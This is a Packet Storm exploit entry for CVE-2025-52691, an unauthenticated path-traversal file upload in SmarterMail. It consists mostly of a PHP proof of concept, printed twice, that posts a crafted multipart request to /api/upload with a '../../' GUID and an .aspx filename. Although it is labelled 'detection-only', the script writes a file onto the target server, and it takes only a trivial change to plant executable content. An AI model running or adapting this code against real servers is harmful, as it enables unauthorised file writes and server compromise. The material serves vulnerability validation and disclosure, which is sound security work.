10
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Description
This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal condition in the...
Basic Information
ID
PACKETSTORM:215889
Published
Feb 19, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.smartertools.com/ |
=============================================================================================================================================
[+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail.
It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal
condition in the contextData GUID to determine whether the target is vulnerable.
The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable,
Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation.
It is intended solely for validation and security assessment purposes.
[+] POC : php poc.php -H https://target.com
<?php
error_reporting(E_ALL);
ini_set('display_errors', 0);
$banner = <<<BANNER
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
watchTowr-vs-SmarterMail-CVE-2025-52691.php
(*) CVE-2025-52691 Detection Artifact Generator
BANNER;
function generateRandomName(int $length = 6): string {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$out = '';
for ($i = 0; $i < $length; $i++) {
$out .= $chars[random_int(0, strlen($chars) - 1)];
}
return $out;
}
function dag(string $host): void {
$name = generateRandomName();
$url = $host . 'api/upload';
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));
$data = "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"context\"\r\n\r\nattachment\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"resumableIdentifier\"\r\n\r\nfakeID\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"resumableFilename\"\r\n\r\nfakefile.aspx\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"contextData\"\r\n\r\n";
$data .= "{\"guid\":\"dag/../../{$name}\"}\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"whatever\"; filename=\"fake.jpg\"\r\n\r\n";
$data .= "Detection Artifact Generator\r\n";
$data .= "--{$boundary}--\r\n";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => [
"Content-Type: multipart/form-data; boundary={$boundary}",
"Content-Length: " . strlen($data)
],
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 15,
]);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($response === false || empty($response)) {
echo "[!] Request failed\n";
return;
}
$json = json_decode($response, true);
if (is_string($json)) {
$json = json_decode($json, true);
}
if (!is_array($json)) {
echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
return;
}
if ($httpCode === 200 && isset($json['key'])) {
if (stripos($json['key'], $name) !== false) {
echo "[+] VULNERABLE - file " . basename($json['key']) . " got uploaded\n";
return;
}
}
if ($httpCode === 400 && ($json['message'] ?? '') === 'INVALID_GUID') {
echo "[-] NOT VULNERABLE - patch applied (INVALID_GUID)\n";
return;
}
echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
}
echo $banner;
$options = getopt("H:", ["host:"]);
if (!isset($options['H']) && !isset($options['host'])) {
echo "Usage : php poc.php -H <host>\n";
echo "Example: php poc.php -H https://smartermail.lab/\n";
exit(1);
}
$host = rtrim($options['H'] ?? $options['host'], '/') . '/';
dag($host);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.smartertools.com/ |
=============================================================================================================================================
[+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail.
It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal
condition in the contextData GUID to determine whether the target is vulnerable.
The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable,
Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation.
It is intended solely for validation and security assessment purposes.
[+] POC : php poc.php -H https://target.com
<?php
error_reporting(E_ALL);
ini_set('display_errors', 0);
$banner = <<<BANNER
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
watchTowr-vs-SmarterMail-CVE-2025-52691.php
(*) CVE-2025-52691 Detection Artifact Generator
BANNER;
function generateRandomName(int $length = 6): string {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$out = '';
for ($i = 0; $i < $length; $i++) {
$out .= $chars[random_int(0, strlen($chars) - 1)];
}
return $out;
}
function dag(string $host): void {
$name = generateRandomName();
$url = $host . 'api/upload';
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));
$data = "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"context\"\r\n\r\nattachment\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"resumableIdentifier\"\r\n\r\nfakeID\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"resumableFilename\"\r\n\r\nfakefile.aspx\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"contextData\"\r\n\r\n";
$data .= "{\"guid\":\"dag/../../{$name}\"}\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"whatever\"; filename=\"fake.jpg\"\r\n\r\n";
$data .= "Detection Artifact Generator\r\n";
$data .= "--{$boundary}--\r\n";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => [
"Content-Type: multipart/form-data; boundary={$boundary}",
"Content-Length: " . strlen($data)
],
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 15,
]);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($response === false || empty($response)) {
echo "[!] Request failed\n";
return;
}
$json = json_decode($response, true);
if (is_string($json)) {
$json = json_decode($json, true);
}
if (!is_array($json)) {
echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
return;
}
if ($httpCode === 200 && isset($json['key'])) {
if (stripos($json['key'], $name) !== false) {
echo "[+] VULNERABLE - file " . basename($json['key']) . " got uploaded\n";
return;
}
}
if ($httpCode === 400 && ($json['message'] ?? '') === 'INVALID_GUID') {
echo "[-] NOT VULNERABLE - patch applied (INVALID_GUID)\n";
return;
}
echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
}
echo $banner;
$options = getopt("H:", ["host:"]);
if (!isset($options['H']) && !isset($options['host'])) {
echo "Usage : php poc.php -H <host>\n";
echo "Example: php poc.php -H https://smartermail.lab/\n";
exit(1);
}
$host = rtrim($options['H'] ?? $options['host'], '/') . '/';
dag($host);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================